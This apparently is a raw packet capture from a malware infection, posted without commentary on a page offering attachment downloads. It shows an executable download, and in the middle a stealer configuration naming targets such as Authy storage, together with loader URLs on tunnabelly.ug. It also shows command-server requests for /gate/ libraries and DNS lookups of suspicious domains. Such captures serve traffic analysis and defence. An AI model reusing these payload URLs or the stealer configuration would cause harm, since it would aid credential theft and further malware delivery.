Download Attachments
-
1
zxcb
Date added: June 24, 2020 4:23 am
Added by: admin
File size: 17 MB
Downloads: 439
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1
E….=@…wX
.
…u-.N.P’&”i….P.@).Q..GET /zxcv.EXE HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=90210-
Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT
If-Range: “177000-5a8859680d070”
Host: jamshed.pk
Connection: Keep-Alive
2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0
E..(.>@…pQ
.
.@….<.P..fx..c.P.?………..
2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win 237, length 0
E..(..@.*.]…u-
.
..P.N….’&$^P…]………
2020-06-23 15:26:21.726642 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], seq 1:1461, ack 502, win 237, length 1460: HTTP: HTTP/1.1 206 Partial Content
E…..@.*.WP..u-
.
..P.N….’&$^P…….HTTP/1.1 206 Partial Content
Date: Tue, 23 Jun 2020 19:29:13 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Sat, 20 Jun 2020 15:23:12 GMT
ETag: “177000-5a8859680d070”
Accept-Ranges: bytes
Content-Length: 1445790
Content-Range: bytes 90210-1535999/1536000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
..P.P…..]..P…….%APPDATA%\\Microsoft\\Windows\\Recent”,”mask”:”*”,”size_limit”:500,”exceptions”:”\\Windows\\\n\\Program Files\\\n\\Program Files (x86)\\\n\\AppData\\Local\\\n\\AppData\\LocalLow\\\n\\AppData\\Roaming\\\n\\ProgramData\\\n\\TEMP\\\n\\PUBLIC\\\n\\System32\\\n\\Keygen\\\n\\Crack\\\n\\Patch\\\n\\Games\\\n\\Game\\\n\\Music\\\n\\Movies\\\n\\Mp3\\\n\\Adobe\\\n\\xampp\\\n\\SteamGames\\\n\\steamapps\\”,”shortcuts”:[“true”]},{“name”:”Authy”,”path”:”%userprofile%\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb”,”size_limit”:2000,”subfolders”:[“true”],”mask”:”*”}],”loader_urls”:null},”lu”:[{“u”:”http://tunnabelly.ug/nw.exe”,”t”:0},{“u”:”http://tunnabelly.ug/ac.exe”,”t”:0},{“u”:”http://tunnabelly.ug/ds1.exe”,”t”:0},{“u”:”http://tunnabelly.ug/ds2.exe”,”t”:0}],”rm”:1,”is_screen_enabled”:1,”is_history_enabled”:1,”depth”:3}
2020-06-23 15:26:37.126576 IP 10.1.10.15.49745 > 34.105.129.68.80: Flags [P.], seq 1:269, ack 1, win 16685, length 268: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..4!.@… w
.
.”i.D.Q.P..z.E…P.A-.I..GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.105.129.68
Connection: Keep-Alive
2020-06-23 15:26:37.217333 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], ack 269, win 509, length 0
E..(.C@.8…”i.D
.
..P.QE…..{.P…< ……..
2020-06-23 15:26:37.241515 IP 10.1.10.15.49744 > 34.105.129.68.80: Flags [.], ack 2254, win 16683, length 0
E..(!.@…!.
.
.”i.D.P.P.]…. .P.A+.y……..
2020-06-23 15:26:37.284456 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], seq 1:1421, ack 269, win 509, length 1420: HTTP: HTTP/1.1 200 OK
E….D@.8..B”i.D
.
..P.QE…..{.P…….HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 23 Jun 2020 19:29:28 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT
ETag: “5c8ff6ea-dfcff”
Accept-Ranges: bytes
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
.
.
……:… ………. FCFJDEFHEOCNDHCNENEBEMFHEBFCEFBM.. ..
2020-06-23 15:26:42.537156 IP 10.1.10.15.49745 > 34.105.129.68.80: Flags [P.], seq 269:534, ack 917003, win 65320, length 265: HTTP: GET /gate/libs.zip HTTP/1.1
E..1,.@….R
.
.”i.D.Q.P..{.F…P..(.`..GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.105.129.68
Connection: Keep-Alive
2020-06-23 15:26:42.629434 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], ack 534, win 507, length 0
E..(..@.8..F”i.D
.
..P.QF…..|.P…=………
2020-06-23 15:26:42.698331 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], seq 917003:918423, ack 534, win 507, length 1420: HTTP: HTTP/1.1 200 OK
E…..@.8…”i.D
.
..P.QF…..|.P…….HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 23 Jun 2020 19:29:34 GMT
Content-Type: application/zip
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Wed, 03 Apr 2019 07:47:18 GMT
ETag: “5ca46506-2b281b”
2020-06-23 15:26:56.819403 IP 10.1.10.15.61623 > 75.75.75.75.53: 32813+ A? tunnabelly.ug. (31)
E..;:…..U.
.
.KKKK…5.’5_.-……….
tunnabelly.ug…..
2020-06-23 15:26:57.044841 IP 75.75.75.75.53 > 10.1.10.15.61623: 32813 1/0/0 A 217.8.117.45 (47)
E..K..@.9…KKKK
.
..5…7…-……….
tunnabelly.ug…………..X….u-
2020-06-23 15:26:57.045514 IP 10.1.10.15.62114 > 75.75.75.75.53: 57616+ AAAA? tunnabelly.ug. (31)
E..;:…..U.
.
.KKKK…5.’…………..
tunnabelly.ug…..
2020-06-23 15:26:57.286870 IP 75.75.75.75.53 > 10.1.10.15.62114: 57616 0/1/0 (91)
E..w..@.9…KKKK
.
..5…c…………..
tunnabelly.ug…………….0.a.dnspod.com..domainadmin.-^..o……….u…..
2020-06-23 15:27:07.278977 IP 10.1.10.15.54896 > 75.75.75.75.53: 54842+ A? thompson.ug. (29)
E..9<…..S.
.
.KKKK.p.5.%o..:………..thompson.ug…..
2020-06-23 15:27:07.514741 IP 75.75.75.75.53 > 10.1.10.15.54896: 54842 1/0/0 A 194.5.97.49 (45)
E..I..@.9…KKKK
.
..5.p.5Mh.:………..thompson.ug…………..X….a1
2020-06-23 15:28:23.855105 IP 10.1.10.15.53544 > 75.75.75.75.53: 51196+ A? vbchjfssdfcxbcver.ru. (38)
E..B<@….S.
.
.KKKK.(.5…Q………….vbchjfssdfcxbcver.ru…..
2020-06-23 15:28:23.949102 IP 75.75.75.75.53 > 10.1.10.15.53544: 51196 NXDomain 0/1/0 (99)
E…..@.9…KKKK
.
..5.(.k……………vbchjfssdfcxbcver.ru…………….1.a.dns.ripn.net.
hostmaster.8.=.=..Q…8@.’……
Please follow and like us: